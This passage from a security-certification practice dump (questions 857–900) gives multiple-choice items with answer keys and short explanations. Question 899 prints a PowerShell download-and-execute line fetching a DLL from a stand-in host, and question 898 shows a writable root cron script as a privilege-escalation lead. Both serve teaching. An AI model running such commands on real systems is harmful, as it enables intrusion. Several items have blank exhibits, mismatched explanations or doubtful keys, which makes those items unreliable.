A. Disconnect all external network connections from the firewall.
B. Send response teams to the network switch locations to perform updates.
C. Turn on all the network switches by using the centralized management software.
D. Initiate the organization's incident response plan.

Answer: D

In the given scenario, since multiple locations are affected, and the network team has identified and turned off the network switches, it suggests a widespread network issue that could have been caused by an attack or a major network fault. Therefore, the next action the network team should take is to initiate the organization's incident response plan. This plan will help them identify the cause of the problem and respond appropriately to minimize the impact and restore normal operations as quickly as possible.

END
QUESTION 858
A security researcher is using an adversary's infrastructure and HTTPS and creating a named group to track those targeted. Which of the following is the researcher MOST likely using?

A. The Cyber Kill Chain
B. The incident response process
C. The Diamond Model of Intrusion Analysis 
D. MITRE ATT&CK

Answer: C

The Diamond Model of Intrusion Analysis suggests a framework to analyze an intrusion event (E) by exploring the relationships between four core features: adversary, capability, infrastructure, and victim. A security researcher can track an adversary by noting its attacks and techniques based on its capabilities, infrastructure, and victims.

END
QUESTION 859
The compliance team requires an annual recertification of privileged and non-privileged user access. 
However, multiple users who left the company six months ago still have access. 
Which of the following would have prevented this compliance violation?

A. Account audits 
B. AUP
C. Password reuse 
D. SSO

Answer: A 

Account audits are periodic reviews of user accounts to ensure that they are being used appropriately and that access is being granted and revoked in accordance with the organization's policies and procedures. If the compliance team had been conducting regular account audits, they would have identified the users who left the company six months ago and ensured that their access was revoked in a timely manner. This would have prevented the compliance violation caused by these users still having access to the company's systems.
To prevent this compliance violation, the company should implement account audits. An account audit is a regular review of all user accounts to ensure that they are being used properly and that they are in compliance with the company's security policies. By conducting regular account audits, the company can identify inactive or unused accounts and remove access for those users. This will help to prevent compliance violations and ensure that only authorized users have access to the company's systems and data.

END
QUESTION 860
Which of the following roles would MOST likely have direct access to the senior management team?

A. Data custodian 
B. Data owner
C. Data protection officer 
D. Data controller

Answer: D
Data controller—the entity responsible for determining why and how data is stored, collected, and used and for ensuring that these purposes and means are lawful. The data controller has ultimate responsibility for privacy breaches, and is not permitted to transfer that responsibility.

END
QUESTION 861
During a forensic investigation, a security analyst discovered that the following command was run on a compromised host:


Which of the following attacks occurred?

A. Buffer overflow 
B. Pass the hash 
C. SQL injection 
D. Replay attack

Answer: B

Attackers can extend their lateral movement by a great deal if they are able to compromise host credentials. One common credential exploit technique for lateral movement is called pass the hash (PtH). This is the process of harvesting an account's
cached credentials when the user is logged into a single sign-on (SSO) system so the attacker can use the credentials on other systems. If the threat actor can obtain the hash of a user password, it is possible to present the hash (without cracking it) to
authenticate to network protocols such as the Windows File Sharing protocol Server Message Block (SMB), and other protocols that accept NTLM hashes as authentication credentials.

END
QUESTION 862
The technology department at a large global company is expanding its Wi-Fi network infrastructure at the headquarters building. Which of the following should be closely coordinated between the technology, cybersecurity, and physical security departments?

A. Authentication protocol 
B. Encryption type
C. WAP placement 
D. VPN configuration

Answer: C

END
QUESTION 863
A user attempts to load a web-based application, but the expected login screen does not appear. 
A help desk analyst troubleshoots the issue by running the following command and reviewing the output on the user's PC:









The help desk analyst then runs the same command on the local PC:







Which of the following BEST describes the attack that is being detected?

A. Domain hijacking 
B. DNS poisoning 
C. MAC flooding
D. Evil twin

Answer: A

domain hijacking A type of hijacking attack where the attacker steals a domain name by altering its registration
information and then transferring the domain name to another entity. Sometimes referred to as brandjacking.

END
QUESTION 864
Which of the following is a cryptographic concept that operates on a fixed length of bits?

A. Block cipher 
B. Hashing
C. Key stretching 
D. Salting

Answer: A 

block cipher A type of symmetric encryption that encrypts data one block at a time, often in 64-bit or 128-bit blocks.

END
QUESTION 865
A business is looking for a cloud service provider that offers a la carte services, including cloud backups, VM elasticity, 
and secure networking. Which of the following cloud service provider types should the business engage?

A. IaaS 
B. PaaS 
C. XaaS 
D. SaaS

Answer: C 

"A la carte" service means you can get any service you want from what the provider offers.

END
QUESTION 866
A security analyst notices that specific files are being deleted each time a systems administrator is on vacation. 
Which of the following BEST describes the type of malware that is running?

A. Fileless virus 
B. Logic bomb
C. Keylogger
D. Ransomware

Answer: B

END
QUESTION 867
Which of the following can reduce vulnerabilities by avoiding code reuse?

A. Memory management 
B. Stored procedures
C. Normalization
D. Code obfuscation

Answer: D 

This will ensure other programmers are unable to reuse your code thereby reducing vulnerabilities in others code.

A stored procedure is a group of SQL statements that execute as a whole, similar to a mini-program. A parameterized stored procedure accepts data as an input called a parameter. Instead of copying the user’s input directly into a SELECT statement, the input is passed to the stored procedure as a parameter. The stored procedure performs data validation, but it also handles the parameter (the inputted data) differently and prevents a SQL injection attack.

Normalization A routine that applies a common consistent format to incoming data so that it can be processed safely.
Normalization is referred to in the context of log collection and software coding.

END
QUESTION 868
A security administrator needs to block a TCP connection using the corporate firewall. 
Because this connection is potentially a threat, the administrator does not want to send back an RST. 
Which of the following actions in the firewall rule would work BEST?

A. Drop 
B. Reject
C. Log alert 
D. Permit

Answer: A 

In the Drop action, no message is sent describing why the package was dropped. In the Reject action, a message is sent to the source describing the reason for the rejection.

END
QUESTION 869
A security team discovered a large number of company-issued devices with non-work-related software installed. 
Which of the following policies would MOST likely contain language that would prohibit this activity?

A. NDA 
B. BPA 
C. AUP 
D. SLA

Answer: C 

An acceptable use policy (AUP) is a document stipulating constraints and practices that a user must agree to for access to a corporate network, the internet or other resources.

END
QUESTION 870
A retail store has a business requirement to deploy a kiosk computer in an open area. 
The kiosk computer's operating system has been hardened and tested. 
A security engineer is concerned that someone could use removable media to install a rootkit. 
Which of the following should the security engineer configure to BEST protect the kiosk computer?

A. Measured boot
B. Boot attestation
C. UEFI
D. EDR

Answer: A 

Measured Boot is a new feature of Windows 8 that was created to help better protect your machine from rootkits and other malware. Measured Boot will check each start up component including the firmware all the way to the boot drivers and it will store this information in what is called a Trusted Platform Module (TPM).

A trusted or measured boot process uses platform configuration registers (PCRs) in the TPM at each stage in the boot process to check whether hashes of key system state data (boot firmware, boot loader, OS kernel, and critical drivers) have changed.
This does not usually prevent boot, but it will record the presence of unsigned kernel level code.

Boot attestation is the capability to transmit a boot log report signed by the TPM via a trusted process to a remote server, such as a network access control server. The boot log can be analyzed for signs of compromise, such as the presence of unsigned drivers. The host can be prevented from accessing the network if it does not meet the required health policy or if no attestation report is received.

END
QUESTION 871
An organization wants to enable built-in FDE on all laptops. 
Which of the following should the organization ensure is installed on all laptops?

A. TPM 
B. CA
C. SAML 
D. CRL

Answer: A 

The organization should ensure that a Trusted Platform Module (TPM) is installed on all laptops to enable built-in Full Disk Encryption (FDE). TPM is a hardware-based security chip that stores encryption keys and helps to protect data from malicious attacks. It is important to ensure that the TPM is properly configured and enabled to get the most out of FDE.

END
QUESTION 872
A security analyst needs to centrally manage credentials and permissions on the company's network devices. 
The following security requirements must be met:

- All actions performed by the network staff must be logged. 
- Per-command permissions must be possible.
- The authentication server and the devices must communicate through TCP.

Which of the following authentication protocols should the analyst choose?

A. Kerberos 
B. CHAP
C. TACACS+ 
D. RADIUS

Answer: C 

TACACS+ (Terminal Access Controller Access Control System Plus) is an authentication protocol that meets the security requirements specified.

END
QUESTION 873
An organization recently released a software assurance policy that requires developers to run code scans each night on the repository. After the first night, the security team alerted the developers that more than 2,000 findings were reported and need to be addressed. Which of the following is the MOST likely cause for the high number of findings?

A. The vulnerability scanner was not properly configured and generated a high number of false positives. 
B. Third-party libraries have been loaded into the repository and should be removed from the codebase.
C. The vulnerability scanner found several memory leaks during runtime, causing duplicate reports for the same issue.
D. The vulnerability scanner was not loaded with the correct benchmarks and needs to be updated.

Answer: A

END
QUESTION 874
A major manufacturing company updated its internal infrastructure and just recently started to allow OAuth applications to access corporate data. Data leakage is now being reported. Which of the following MOST likely caused the issue?

A. Privilege creep
B. Unmodified default settings 
C. TLS protocol vulnerabilities 
D. Improper patch management

Answer: B

END
QUESTION 875
A security team is engaging a third-party vendor to do a penetration test of a new proprietary application prior to its release. 
Which of the following documents would the third-party vendor MOST likely be required to review and sign?

A. SLA 
B. NDA
C. MOU 
D. AUP

Answer: B 

The third-party vendor would most likely be required to review and sign a non-disclosure agreement (NDA) or confidentiality agreement. This document outlines the terms and conditions of the engagement, including the requirement for the vendor to keep all information about the proprietary application confidential and not to disclose any information about the test results or findings to any third parties.

END
QUESTION 876
During a Chief Information Security Officer (CISO) convention to discuss security awareness, the attendees are provided with a network connection to use as a resource. As the convention progresses, one of the attendees starts to notice delays in the connection, and the HTTPS site requests are reverting to HTTP. Which of the following BEST describes what is happening?

A. Birthday collision on the certificate key 
B. DNS hijacking to reroute traffic
C. Brute force to the access point 
D. A SSL/TLS downgrade

Answer: D

END
QUESTION 877
Audit logs indicate an administrative account that belongs to a security engineer has been locked out multiple times during the day. The security engineer has been on vacation for a few days. Which of the following attacks can the account lockout be attributed to?

A. Backdoor 
B. Brute-force 
C. Rootkit
D. Trojan

Answer: B

END
QUESTION 878
After installing a patch on a security appliance, an organization realized a massive data exfiltration had occurred. 
Which of the following BEST describes the incident?

A. Supply chain attack 
B. Ransomware attack 
C. Cryptographic attack 
D. Password attack

Answer: A

END
QUESTION 879
Physical access to the organization's servers in the data center requires entry and exit through multiple access points: a lobby, an access control vestibule, three doors leading to the server floor, a door to the server floor itself, and eventually to a caged area solely for the organization's hardware. Which of the following controls is described in this scenario?

A. Compensating 
B. Deterrent
C. Preventive 
D. Detective

Answer: C

END
QUESTION 880
A company is switching to a remote work model for all employees. All company and employee resources will be in the cloud. Employees must use their personal computers to access the cloud computing environment. The company will manage the operating system. Which of the following deployment models is the company implementing?

A. CYOD 
B. MDM 
C. COPE 
D. VDI

Answer: D

END
QUESTION 881
A security administrator needs to inspect in-transit files on the enterprise network to search for PII, credit card data, and classification words. Which of the following would be the BEST to use?

A. IDS solution 
B. EDR solution
C. HIPS software solution 
D. Network DLP solution

Answer: D

END
QUESTION 882
The Chief Executive Officer announced a new partnership with a strategic vendor and asked the Chief Information Security Officer to federate user digital identities using SAML-based protocols. Which of the following will this enable?

A. SSO 
B. MFA 
C. PKI 
D. DLP

Answer: A 

The implementation of SAML-based protocols will enable Single Sign-On (SSO).

END
QUESTION 883 Possible DUP
An employee's company account was used in a data breach. Interviews with the employee revealed:

- The employee was able to avoid changing passwords by using a previous password again.
- The account was accessed from a hostile, foreign nation, but the employee has never traveled to any other countries.

Which of the following can be implemented to prevent these issues from reoccurring? (Choose two.)

A. Geographic dispersal 
B. Password complexity 
C. Password history
D. Geotagging
E. Password lockout 
F. Geofencing

Answer: CF 

C - User bypassed changing passwords by using a previously used pwd.
F - User has never travelled to another country, so geofencing will limit access to current location.

END
QUESTION 884
A candidate attempts to go to http://comptia.org but accidentally visits http://comptiia.org. 
The malicious website looks exactly like the legitimate website. Which of the following BEST describes this type of attack?

A. Reconnaissance 
B. Impersonation 
C. Typo-squatting 
D. Watering-hole

Answer: C 

Typo-squatting is a type of cyber-attack where an attacker creates a domain name that is similar to a legitimate domain name, but with a slight variation, such as a misspelling, in order to trick users into visiting the malicious site. In this case, the malicious site "comptiia.org" is designed to look like the legitimate site "comptia.org", in an attempt to steal sensitive information or perform other malicious activities.

END
QUESTION 885
The marketing department at a retail company wants to publish an internal website to the internet so it is reachable by a limited number of specific, external service providers in a secure manner. Which of the following configurations would be BEST to fulfil this requirement?

A. NAC 
B. ACL 
C. WAF 
D. NAT

Answer: B

Allowing remote access to your private network can expose your network to many risks from the clients. If a user logs on to a VPN with a malware-infected computer, this computer can then infect other computers on the internal network. Network access control (NAC) methods provide continuous security monitoring by inspecting computers and preventing them from accessing the network if they don’t pass the inspection. Most administrators have complete control over computers in their network. For example, they can ensure desktop computers have up-to-date antivirus software installed, operating systems have current patches applied, and their firewalls are enabled. However, administrators don’t have complete control of computers that employees use at home or on the road.

Network access control (NAC) products can extend the scope of authentication to allow administrators to devise policies or
profiles describing a minimum security configuration that devices must meet to be granted network access. This is called a health policy. Typical policies check things such as malware infection, firmware and OS patch level, personal firewall status, and the
presence of up-to-date virus definitions.

END
QUESTION 886
A network-connected magnetic resonance imaging (MRI) scanner at a hospital is controlled and operated by an outdated and unsupported specialized Windows OS. Which of the following is MOST likely preventing the IT manager at the hospital from upgrading the specialized OS?

A. The time needed for the MRI vendor to upgrade the system would negatively impact patients. 
B. The MRI vendor does not support newer versions of the OS.
C. Changing the OS breaches a support SLA with the MRI vendor.
D. The IT team does not have the budget required to upgrade the MRI scanner.

Answer: B 

END
QUESTION 887
A company received a "right to be forgotten" request. To legally comply, the company must remove data related to the requester from its systems. Which of the following is the company MOST likely complying with?

A. NIST CSF 
B. GDPR
C. PCI DSS 
D. ISO 27001

Answer: B 

The General Data Protection Regulation (GDPR) governs how personal data must be collected, processed, and erased. 
The "right to be forgotten," which received a lot of press after the 2014 judgment from the EU Court of Justice, set the precedent for the right of erasure provision contained in the GDPR.

END
QUESTION 888
A security administrator is evaluating remote access solutions for employees who are geographically dispersed. 
Which of the following would provide the MOST secure remote access? (Choose two.)

A. IPSec 
B. SFTP 
C. SRTP 
D. LDAPS 
E. S/MIME
F. SSL VPN

Answer: AF

END
QUESTION 889 Possible Dup
A company is looking to migrate some servers to the cloud to minimize its technology footprint. 
The company has a customer relationship management system on premises. 
Which of the following solutions will require the LEAST infrastructure and application support from the company?

A. SaaS 
B. IaaS 
C. PaaS 
D. SDN

Answer: A

END
QUESTION 890
A network administrator needs to determine the sequence of a server farm's logs. 
Which of the following should the administrator consider? (Choose two.)

A. Chain of custody 
B. Tags
C. Reports
D. Time stamps 
E. Hash values 
F. Time offset

Answer: DF 

Time stamps and the time offset (think time zones) will definitely impact the order in which they are displayed.

END
QUESTION 891
A security administrator, who is working for a government organization, would like to utilize classification and granular planning to secure top secret data and grant access on a need-to-know basis. Which of the following access control schemas should the administrator consider?

A. Mandatory 
B. Rule-based 
C. Discretionary 
D. Role-based

Answer: A 

In a MAC system, an operating system provides individual users with access based on data confidentiality and levels of user clearance. MAC is the strictest of all models. Access is granted on a strict, need-to-know  basis. 
Users must prove they need the requested information or access before gaining permission.

END
QUESTION 892
An organization is outlining data stewardship roles and responsibilities. 
Which of the following employee roles would determine the purpose of data and how to process it?

A. Data custodian
B. Data controller
C. Data protection officer 
D. Data processor

Answer: B 

Data controller—the entity responsible for determining why and how data is stored, collected, and used and for ensuring that these purposes and means are lawful. The data controller has ultimate responsibility for privacy breaches, and is not permitted to transfer that responsibility. 

Data processor—an entity engaged by the data controller to assist with technical collection, storage, or analysis tasks. 
A data processor follows the instructions of a data controller with regard to collection or processing.

The entities who determine the reasons for processing personal information and direct the methods of processing that data. 
This term is used primarily in European law and it serves as a substitute for the term data owner to avoid a presumption that anyone who collects data has an ownership interest in that data.

END
QUESTION 893
Multiple beaconing activities to a malicious domain have been observed. 
The malicious domain is hosting malware from various endpoints on the network. 
Which of the following technologies would be BEST to correlate the activities between the different endpoints?

A. Firewall 
B. SIEM 
C. IPS
D. Protocol analyzer

Answer: B

END
QUESTION 894
Users report access to an application from an internal workstation is still unavailable to a specific server, even after a recent firewall rule implementation that was requested for this access. ICMP traffic is successful between the two devices. 
Which of the following tools should the security analyst use to help identify if the traffic is being blocked?

A. nmap 
B. tracert 
C. ping 
D. ssh

Answer: A 

Nmap help identify if traffic is being blocked between two devices.

END
QUESTION 895
As part of annual audit requirements, the security team performed a review of exceptions to the company policy that allows specific users the ability to use USB storage devices on their laptops. The review yielded the following results:

- The exception process and policy have been correctly followed by the majority of users.
- A small number of users did not create tickets for the requests but were granted access.
- All access had been approved by supervisors.
- Valid requests for the access sporadically occurred across multiple departments.
- Access, in most cases, had not been removed when it was no longer needed.

Which of the following should the company do to ensure that appropriate access is not disrupted but unneeded access is removed in a reasonable time frame?

A. Create an automated, monthly attestation process that removes access if an employee's supervisor denies the app. 
B. Remove access for all employees and only allow new access to be granted if the employee's supervisor approves it. 
C. Perform a quarterly audit of all user accounts that have been granted access and verify the exceptions with the manager. 
D. Implement a ticketing system that tracks each request and generates reports listing which employees actively use USB.

Answer: C

END
QUESTION 896
A crypto-mining company recently deployed a new antivirus application to all of its mining systems. 
The installation of the antivirus application was tested on many personal devices, and no issues were observed. 
Once the antivirus application was rolled out to the servers, constant issues were reported. 
As a result, the company decided to remove the mining software. 
The antivirus application was MOST likely classifying the software as:

A. a rootkit. 
B. a PUP.
C. a backdoor. 
D. ransomware. 
E. a RAT.

Answer: B 

The mining software was MOST likely being classified by the antivirus application as a Potentially Unwanted Program (PUP).

END
QUESTION 897
A company recently implemented a patch management policy; however, vulnerability scanners have still been flagging several hosts, even after the completion of the patch process. Which of the following is the MOST likely cause of the issue?

A. The vendor firmware lacks support.
B. Zero-day vulnerabilities are being discovered. 
C. Third-party applications are not being patched. 
D. Code development is being outsourced.

Answer: C 

It's not zero day. It's extremely unlikely a vulnerability scanner would discover a zero day vulnerability that nobody knows exists.

END
QUESTION 898
A penetration tester executes the command crontab -l while working in a Linux server environment. 
The penetration tester observes the following string in the current user's list of cron jobs:

*/10 * * * * root /writable/update.sh

Which of the following actions should the penetration tester perform NEXT?

A. Privilege escalation 
B. Memory leak
C. Directory traversal 
D. Race condition

Answer: A 

The penetration tester has discovered a cron job that runs every 10 minutes as the root user and executes the script /writable/update.sh. This suggests that the update.sh script has write permissions in a directory that is writable by the current user.
Therefore, the next logical step for the penetration tester would be to review the contents of the /writable directory and the update.sh script to determine if there are any vulnerabilities that can be exploited to escalate privileges or otherwise compromise the system.

END
QUESTION 899
An employee received an email with an unusual file attachment named Updates.lnk. A security analyst is reverse engineering what the file does and finds that it executes the following script:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;Start-Process rundll32.exe $env:TEMP\autoupdate.dll

Which of the following BEST describes what the analyst found?

A. A PowerShell code is performing a DLL injection. 
B. A PowerShell code is displaying a picture.
C. A PowerShell code is configuring environmental variables. 
D. A PowerShell code is changing Windows Update settings.

Answer: A 

Remote server using PowerShell and saving it as "autoupdate.dll" in the user's temporary folder. It then executes the file using the "rundll32.exe" program, which suggests that the file is being used to perform some sort of malicious activity.

END
QUESTION 900
Which of the following BEST describes the team that acts as a referee during a penetration-testing exercise?

A. White team 
B. Purple team 
C. Green team 
D. Blue team 
E. Red team

Answer: A 

A white-team is typically defined as the referees in a penetration test or security assessment exercise. They establish the RoE, other guidelines, and boundaries of the security evaluation. They oversee the event and ensure that both sides of the simulated conflict/breach/intrusion are operating by the rules. They also facilitate communication between the blue-team and red-team.

END